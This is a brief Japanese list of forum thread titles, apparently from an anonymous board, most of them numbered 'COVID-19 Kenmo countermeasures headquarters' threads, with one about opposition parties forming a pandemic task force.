【新型コロナ】嫌儲対策本部 ☆58 【新型コロナ】嫌儲対策本部 ☆8 【新型コロナ】嫌儲対策本部 ☆94 【新型コロナ】嫌儲対策本部 ☆9 【新型肺炎】野党、対策本部立ち上げへ 【新型コロナ】嫌儲対策本部 ☆10 【新型コロナ】嫌儲対策本部 ☆12 【新型コロナ】嫌儲対策本部 ☆27 【新型コロナ】嫌儲対策本部 ☆350 【新型コロナ】嫌儲対策本部 ☆310 【新型コロナ】嫌儲対策本部 ☆311 【新型コロナ】嫌儲対策本部 ☆325 【新型コロナ】嫌儲対策本部 ☆26 【新型コロナ】嫌儲対策本部 ☆319 【新型コロナ】嫌儲対策本部 ☆14 【新型コロナ】嫌儲対策本部 ☆35
ブックマークへ